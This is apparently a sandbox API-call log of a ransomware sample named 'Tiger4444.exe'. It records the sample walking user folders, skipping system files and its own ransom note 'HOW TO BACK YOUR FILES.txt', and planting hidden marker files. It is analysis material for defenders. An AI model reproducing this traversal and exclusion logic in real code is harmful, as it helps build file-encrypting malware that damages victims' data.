1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0046.211] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0046.211] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0046.211] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0046.211] lstrcpyW (in: lpString1=0x30aeadc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0046.211] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\desktop.ini", dwFileAttributes=0x22) returned 1 [0046.211] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\desktop.ini", dwFileAttributes=0x6) returned 1 [0046.211] lstrlenW (lpString="desktop.ini") returned 11 [0046.211] lstrlenW (lpString="Tiger4444") returned 9 [0046.211] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0046.211] lstrlenW (lpString=".dll") returned 4 [0046.211] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0046.211] lstrlenW (lpString=".lnk") returned 4 [0046.211] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0046.211] lstrlenW (lpString=".ini") returned 4 [0046.211] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0046.211] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0046.211] lstrcmpiW (lpString1="Links", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.211] lstrcmpiW (lpString1="Links", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.211] lstrcmpiW (lpString1="Links", lpString2="Tiger4444.exe") returned -1 [0046.211] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0046.211] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0046.211] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0046.211] lstrcmpiW (lpString1="Links", lpString2="bootmgr") returned 1 [0046.211] lstrcmpiW (lpString1="Links", lpString2="pagefile.sys") returned -1 [0046.211] lstrcmpiW (lpString1="Links", lpString2="boot") returned 1 [0046.212] lstrcmpiW (lpString1="Links", lpString2="ids.txt") returned 1 [0046.212] lstrcmpiW (lpString1="Links", lpString2="NTUSER.DAT") returned -1 [0046.212] lstrcpyW (in: lpString1=0x30aeadc, lpString2="Links" | out: lpString1="Links") returned="Links" [0046.212] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links", dwFileAttributes=0x10) returned 1 [0046.212] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0046.212] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x40) returned 0xc82418 [0046.212] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc666a8 [0046.212] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0046.212] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0046.212] lstrcpyW (in: lpString1=0x30aeadc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.212] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\favorites\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.224] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.224] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.224] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.224] CloseHandle (hObject=0x260) returned 1 [0046.225] CloseHandle (hObject=0x2ac) returned 1 [0046.225] GetCurrentThreadId () returned 0xfa8 [0046.225] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0046.225] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Favorites\\Links", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0046.225] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc82418 | out: hHeap=0xc50000) returned 1 [0046.225] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0046.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Favorites\\Links" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0046.225] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links\\") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\" [0046.225] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3" [0046.226] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\favorites\\links\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.228] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.230] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.233] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.234] CloseHandle (hObject=0x2ac) returned 1 [0046.234] lstrlenW (lpString="C:\\Users\\FD1HVy\\Favorites\\Links") returned 31 [0046.234] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.234] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8091b580, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0046.235] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.235] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.235] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.235] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.235] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8091b580, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.235] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.235] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.235] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.235] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.235] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.235] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8091b580, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8091b580, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x809417a1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.235] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.235] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.235] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0046.235] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0046.235] lstrcpyW (in: lpString1=0x30aeae8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0046.235] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x22) returned 1 [0046.236] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x6) returned 1 [0046.236] lstrlenW (lpString="desktop.ini") returned 11 [0046.236] lstrlenW (lpString="Tiger4444") returned 9 [0046.236] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0046.236] lstrlenW (lpString=".dll") returned 4 [0046.236] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0046.236] lstrlenW (lpString=".lnk") returned 4 [0046.236] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0046.236] lstrlenW (lpString=".ini") returned 4 [0046.236] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0046.236] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0046.236] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0046.236] lstrcpyW (in: lpString1=0x30aeae8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.236] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\favorites\\links\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.236] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.237] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.237] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.237] CloseHandle (hObject=0x260) returned 1 [0046.237] CloseHandle (hObject=0x2ac) returned 1 [0046.238] GetCurrentThreadId () returned 0xfa8 [0046.238] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0046.238] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Downloads", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0046.238] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72f88 | out: hHeap=0xc50000) returned 1 [0046.238] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0046.238] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Downloads" | out: lpString1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0046.238] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Downloads\\") returned="C:\\Users\\FD1HVy\\Downloads\\" [0046.238] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Downloads\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3" [0046.238] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\downloads\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.239] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.242] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.243] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.243] CloseHandle (hObject=0x2ac) returned 1 [0046.244] lstrlenW (lpString="C:\\Users\\FD1HVy\\Downloads") returned 25 [0046.244] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.244] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc19bd8f2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x809417a1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0046.244] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.244] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.244] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.244] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.244] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc19bd8f2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x809417a1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.244] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.244] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.244] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.244] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.244] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.244] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x809417a1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x809417a1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x809417a1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.244] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.244] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.244] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0046.244] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.244] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.244] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0046.244] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0046.245] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0046.245] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0046.245] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0046.245] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0046.245] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0046.245] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0046.245] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0046.245] lstrcpyW (in: lpString1=0x30aeadc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0046.245] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", dwFileAttributes=0x22) returned 1 [0046.245] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", dwFileAttributes=0x6) returned 1 [0046.245] lstrlenW (lpString="desktop.ini") returned 11 [0046.245] lstrlenW (lpString="Tiger4444") returned 9 [0046.245] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0046.245] lstrlenW (lpString=".dll") returned 4 [0046.245] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0046.245] lstrlenW (lpString=".lnk") returned 4 [0046.245] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0046.245] lstrlenW (lpString=".ini") returned 4 [0046.245] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0046.246] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0046.246] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0046.246] lstrcpyW (in: lpString1=0x30aeadc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.246] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\downloads\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.246] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.246] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.246] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.246] CloseHandle (hObject=0x260) returned 1 [0046.246] CloseHandle (hObject=0x2ac) returned 1 [0046.247] GetCurrentThreadId () returned 0xfa8 [0046.247] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0046.247] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0046.247] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72e48 | out: hHeap=0xc50000) returned 1 [0046.247] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0046.247] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents" | out: lpString1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0046.247] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0046.247] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3" [0046.247] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.249] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.251] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.252] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.253] CloseHandle (hObject=0x2ac) returned 1 [0046.253] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents") returned 25 [0046.254] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.254] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6840edeb, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80967a64, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0046.254] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.254] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.254] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.254] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.254] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6840edeb, 